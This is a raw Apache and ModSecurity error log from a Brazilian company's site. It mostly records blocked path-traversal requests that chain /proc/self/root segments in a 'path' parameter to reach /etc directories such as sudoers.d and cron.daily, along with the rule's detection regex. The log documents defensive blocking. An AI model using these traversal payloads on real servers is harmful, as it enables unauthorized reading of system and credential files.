[Thu Mar 19 12:11:14.912615 2026] [mime_magic:error] [pid 17653:tid 140411658000128] (70014)End of file found: [client 216.73.216.191:15418] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 12:11:29.585415 2026] [access_compat:error] [pid 17653:tid 140411590858496] [client 51.210.111.249:35745] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Thu Mar 19 12:11:40.133790 2026] [proxy_fcgi:error] [pid 17653:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:46026] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:11:45.836055 2026] [:error] [pid 27293:tid 140411666392832] [client 74.7.243.128:52344] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwSMf-YZRR_7pZ7nDKVbgAAA8k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:11:50.559486 2026] [:error] [pid 27403:tid 140411624429312] [client 74.7.244.43:42772] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwSNhkFeYa1D6dYQnD68AAAAc4"]
[Thu Mar 19 12:12:09.077782 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.243.128:53414] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwSSQkwaGbbGflqUZDPKwAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 12:12:19.125805 2026] [proxy_fcgi:error] [pid 15826:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:47130] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:12:19.570542 2026] [core:alert] [pid 17887:tid 140411582465792] [client 57.141.18.5:51268] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 12:12:49.137569 2026] [proxy_fcgi:error] [pid 17887:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:47968] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:13:18.153836 2026] [proxy_fcgi:error] [pid 17653:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:48840] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:13:25.888612 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.241.31:34642] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwSlda6ubjKNq_cu4ZgOgAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:13:27.048436 2026] [mime_magic:error] [pid 15826:tid 140411590858496] (70014)End of file found: [client 57.141.18.42:52874] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 12:13:45.793608 2026] [proxy_fcgi:error] [pid 31803:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:49578] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:13:52.502382 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.241.31:57858] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwSsAkwaGbbGflqUZDPoQAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:14:00.395621 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.241.31:51560] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwSuAkwaGbbGflqUZDPsAAAAMU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:14:07.129805 2026] [proxy_fcgi:error] [pid 17653:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:50172] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:14:08.392658 2026] [:error] [pid 27403:tid 140411582465792] [client 74.7.241.31:51570] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwSvhkFeYa1D6dYQnD7PwAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:14:13.858889 2026] [:error] [pid 19093:tid 140411716749056] [client 74.7.241.31:36446] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwSxV_V7PWP6ixUYl7GrgAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:14:16.366237 2026] [:error] [pid 27293:tid 140411699963648] [client 74.7.241.31:36454] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwSyP-YZRR_7pZ7nDKVzQAAA8U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:14:22.083138 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.241.31:56412] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwSzuoXxyEfFpUF8f8X0gAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:14:29.122046 2026] [proxy_fcgi:error] [pid 19093:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:50892] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:14:53.157795 2026] [proxy_fcgi:error] [pid 26799:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:51634] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:15:16.900910 2026] [proxy_fcgi:error] [pid 15826:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:52358] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:15:19.436632 2026] [:error] [pid 27293:tid 140411574073088] [client 74.7.241.31:51226] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTB_-YZRR_7pZ7nDKWCwAAA9Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:15:23.399472 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.241.31:51098] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTC9a6ubjKNq_cu4ZgWQAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:15:27.105701 2026] [:error] [pid 17653:tid 140411691570944] [client 74.7.241.31:51108] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTD8df6f5d65gmYZSCdwAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:15:30.248305 2026] [:error] [pid 19093:tid 140411716749056] [client 74.7.241.31:54054] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTEl_V7PWP6ixUYl7G3wAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:15:30.374953 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.228.61:40920] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwTEgkwaGbbGflqUZDQAAAAANE"]
[Thu Mar 19 12:15:33.194606 2026] [:error] [pid 14269:tid 140411557287680] [client 74.7.241.31:54058] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTFQbLMZ6AikZjR9VoCwAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:15:39.153780 2026] [proxy_fcgi:error] [pid 27293:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:53166] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:15:43.009107 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.241.31:54062] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTH_u8EFLIOrSqIpuyMgAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:15:46.242968 2026] [:error] [pid 27403:tid 140411649607424] [client 74.7.241.31:43508] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTIhkFeYa1D6dYQnD7owAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:15:48.507142 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.241.31:47528] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTJAkwaGbbGflqUZDQFgAAANM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:15:51.356423 2026] [:error] [pid 19093:tid 140411582465792] [client 74.7.241.31:47532] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTJ1_V7PWP6ixUYl7G7AAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:15:56.245490 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.241.31:47546] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTLOoXxyEfFpUF8f8YCQAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:15:59.003318 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.241.31:53810] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTL-yqAr6etmhZHNpqswAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:16:00.129824 2026] [proxy_fcgi:error] [pid 14269:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:53846] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:16:01.231293 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.241.31:53812] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTMfu8EFLIOrSqIpuyQwAAAkc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
